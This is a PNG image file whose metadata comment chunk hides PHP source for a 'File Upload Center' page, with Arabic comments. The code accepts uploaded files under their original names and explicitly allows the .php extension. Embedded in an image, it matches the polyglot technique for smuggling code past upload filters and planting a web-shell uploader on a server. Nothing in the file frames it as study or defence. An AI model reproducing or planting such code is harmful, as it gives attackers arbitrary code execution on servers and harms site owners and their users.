PNG


IHDR < < : r gAMA
a pHYs    k tEXtSoftware paint.net 4.1.5dGXR  IDAThC oE  C  T 15FË 1
&hb|@$ _ Z & Q  - ( J0j ' | = ޻ w
O ={fv {f n;  Bu Ec )  3+  m
nS1 f īδ00 E`5< W Ia (o !y
W I -4$᪳ l > $ZuV ڠ hթA Y %Ѫ3 NӊfK V baC F _ ,( h ) I=b[J{̏׻M c P YҾT W s q H*Zu  ؃N,688  pbvtG ftt  > {K͑ j$ : 6 y  N; y vg Ȉ b = g >{j m  pq X l  :iP) i+ﺓ # mn 

-& E ]G M 9u E + v j 9lpͩ } . /Fq i= e Z =Ք L Q' \ ƍfo 'z
ղs SYc m. E  ՞rF, 4 ! } i |X
j #;6(U z 'vrr b 5 z V
@v ])ˑ 8 ) { /W *A5 9  c zZԶU e9 C@ @% IV s\ ٍ߽ @ Ƙ x ?.lcaq m e_l ,b m )
b~5 n; M S ;CF[ 4& % 'O G$˾ D٥ p2 Zb x 0 +( -& /6ӽ  > |   @0m } | { ) }  fhm! "6 2R vϲ A Y  gg| u,+Ȯ+ '髜 {gY" c
E w
J*/& ߦފ z > / : Z # 4  q୉ W oÌ e  < Y T ? FצD  "  _ ־67#|_F  \  j fE  ݶ a E8KS #
[sb}  +x 7/ } * d2 8jAcqf [  ? f& +" u‚ V a J " /XpHk a #+<F[ 7p} n d -= ; N = yk l U Hx z[k^Ą̎` g > % . \ 8 . 9 E -vp
og 5 8 3 k 
Wp N a T hF ߕ 4  h
]W WO  /% /P zx Ͱ  Y ` E
G ~ [ #>^1 ][.b} \ S Vt , l 뺏 ʠâ  X N Db U1 ?
 ?  > !# u HIA$ ٱue Ar . |H=  x K ]
ʜe W Xh2
W E 2 a |  ˶ |~ z{ $ ] 9l` ,? Փn ~]$c TL> I<& oI R Jم  *z 0 1[ { ~ # l  5 : FA' ղ
h 5˷ ZbAu
4 ]D'
ӇN bAu \ F, N
: k ӊ Y : +  Y
Nr Eg
 r x | 2 ՙN f[xBՙ€  PAuf M0 xOd Bՙ xr : dT睋 4 ڝ   iTXtComment
// تعريف المسار حيث سيتم رفع الملفات
$uploadDir = 'uploads/';
$allowedExts = array('php', 'jpg', 'jpeg', 'png', 'gif');
$maxFileSize = 5 * 1024 * 1024; // 5 ميجابايت
// إنشاء المجلد إذا لم يكن موجودًا
if (!is_dir($uploadDir)) {
mkdir($uploadDir, 0755, true);
}
// التحقق من رفع ملف
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_FILES['file'])) {
$file = $_FILES['file'];
$fileName = basename($file['name']);
$filePath = $uploadDir . $fileName;
$fileExt = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
// التحقق من نوع الملف
if (in_array($fileExt, $allowedExts) && $file['size'] <= $maxFileSize) {
// التحقق من رفع الملف بنجاح
if (move_uploaded_file($file['tmp_name'], $filePath)) {
echo "<p>File uploaded successfully: <a href=\"$filePath\">$fileName</a></p>";
} else {
echo "<p>Error uploading file.</p>";
}
} else {
echo "<p>Invalid file type or file size exceeds limit.</p>";
}
}

<!DOCTYPE html>


File Upload Center <title>File Upload Center</title>
<style>
body { background-color: #000; color: #fff; text-align: center; padding: 50px; }
input[type="file"] { color: #000; }
input[type="submit"] { background-color: #444; color: #fff; border: none; padding: 10px 20px; }
input[type="submit"]:hover { background-color: #666; }
</style>


Upload Files







 g IEND B`